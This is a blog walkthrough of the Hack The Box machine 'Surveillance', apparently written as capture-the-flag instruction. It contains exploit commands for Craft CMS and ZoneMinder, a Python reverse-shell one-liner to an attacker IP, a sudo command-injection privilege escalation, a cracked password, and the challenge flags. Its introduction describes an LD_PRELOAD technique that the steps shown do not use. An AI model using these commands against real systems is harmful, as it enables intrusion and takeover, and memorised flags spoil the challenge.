Command Palette

Search for a command to run...

Blog
PreviousNext

Surveillance - Walkthrough

Surveillance is a medium-difficulty Linux machine that showcases a vulnerability CVE-2023-41892 in Craft CMS, which abuses PHP object injection to inject PHP content into the Craft CMS web log files to gain Remote Code Execution (RCE). The privilege escalation abuses ZoneMinder with an authenticated remote code injection in the HostController.php API endpoint to gain a shell as the zoneminder user. As this user, a sudo entry is abused by adding a configuration environment variable LD_PRELOAD via the admin panel and loading the malicious library file through zmdc.dl on the target, compromising the system.

Reconnaissance

We begin with an Nmap scan to identify open services:

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping 10.10.11.245 -oG allPorts

The scan reveals:

PORTSTATESERVICE
22/tcpopenssh
80/tcpopenhttp

A targeted scan provides more details:

sudo nmap -p22,80 -sCV 10.10.11.245 -oN targeted
  • SSH → OpenSSH 8.9p1 Ubuntu 3ubuntu0.4
  • HTTP → Nginx 1.18.0, redirecting to surveillance.htb

We add the hostname to /etc/hosts:

sudo sh -c 'echo "10.10.11.245 surveillance.htb" >> /etc/hosts'

surveillance.htb

Foothold

The website runs Craft CMS 4.4.14, which is vulnerable to CVE-2023-41892 (Unauthenticated RCE).

We use a public exploit:

python3 51918.py http://surveillance.htb/

The exploit creates a webshell at /shell.php, allowing command execution.

We inject a Python reverse shell:

export RHOST="10.10.14.6";export RPORT=5000;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

Post-Exploitation

We stabilize the shell and enumerate the system. In the backups directory, we find a database dump:

wget http://10.10.11.245:7000/surveillance--2023-10-17-202801--v4.4.14.sql.zip
unzip surveillance--2023-10-17-202801--v4.4.14.sql.zip

Extracting the admin hash:

INSERT INTO `users` VALUES (1,NULL,1,0,0,0,1,'admin','Matthew B','Matthew','B','[email protected]','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec','2023-10-17 20:22:34',NULL,NULL,NULL,'2023-10-11 18:58:57',NULL,1,NULL,NULL,NULL,0,'2023-10-17 20:27:46','2023-10-11 17:57:16','2023-10-17 20:27:46');

We crack the SHA-256 hash:

hashcat hash.txt -m 1400 /usr/share/wordlists/rockyou.txt
39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec:starcraft122490
UsernamePassword
matthewstarcraft122490

We SSH as matthew and capture the user flag:

cat user.txt

User flag: 61b25f96f74b80c7960c40f5af445bdf

Privilege Escalation

Enumerating the system, we discover ZoneMinder running on port 2222. The version is vulnerable to CVE-2023-26035 (authenticated RCE).

We execute the exploit:

python3 exploit.py -t http://127.0.0.1:2222/ -i 10.10.14.6 -p 7777

We gain a shell as the zoneminder user. The user can run /usr/bin/zmupdate.pl as root with sudo.

We exploit this to gain root access:

sudo /usr/bin/zmupdate.pl --version=1 --user='$(/bin/bash -i)' --pass=ZoneMinderPassword2023

We obtain a root shell and capture the flag:

cat /root/root.txt

Root flag: 42a331e03dcb97f8dcaf335eb62950e4